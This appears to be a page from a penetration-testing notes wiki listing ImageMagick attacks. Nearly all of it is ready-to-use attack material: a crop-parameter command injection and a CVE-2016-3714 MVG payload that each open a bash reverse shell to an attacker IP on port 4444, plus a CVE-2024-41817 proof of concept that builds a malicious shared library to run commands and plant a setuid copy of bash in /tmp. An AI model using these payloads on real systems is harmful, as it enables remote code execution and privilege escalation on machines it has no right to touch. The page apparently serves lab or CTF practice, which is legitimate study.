ImageMagick

Check Version

magick -version

Arbitrary Code Execution via crop

{
	"imageId": "9192ab80-55e4-4a28-b1d7-5d7aed0b7fdd",
	"transformType": "crop",
	"params": {
		"x": "|| bash -c 'sh -i >& /dev/tcp/10.10.14.21/4444 0>&1'||",
		"y": 0,
		"width": 3164,
		"height": 4430
	}
}

Command injection via fill - CVE-2016-3714

The vulnerability primarily affects the following formats:SVG,EPS,MVG,PDF,XML

push graphic-context
viewbox 0 0 640 480
fill 'url(https://1.1.1.1/tokyo.jpg"|bash -i >& /dev/tcp/10.10.16.5/4444 0>&1;echo "yay)'
pop graphic-context

Arbitrary Code Execution in `AppImage` version - CVE-2024-41817

Read about the POC

Build the shared library

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("id");
    exit(0);
}
EOF

Check that running magick runs id

magick /dev/null /dev/null

Replace id with a copy of bash

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("cp /bin/bash /tmp/tokyo; chmod 6777 /tmp/tokyo");
    exit(0);
}
EOF

In case you need to wait

sleep 45; ls -l /tmp/tokyo

PreviousTomcat NextLimeSurvey

Last updated 29 days ago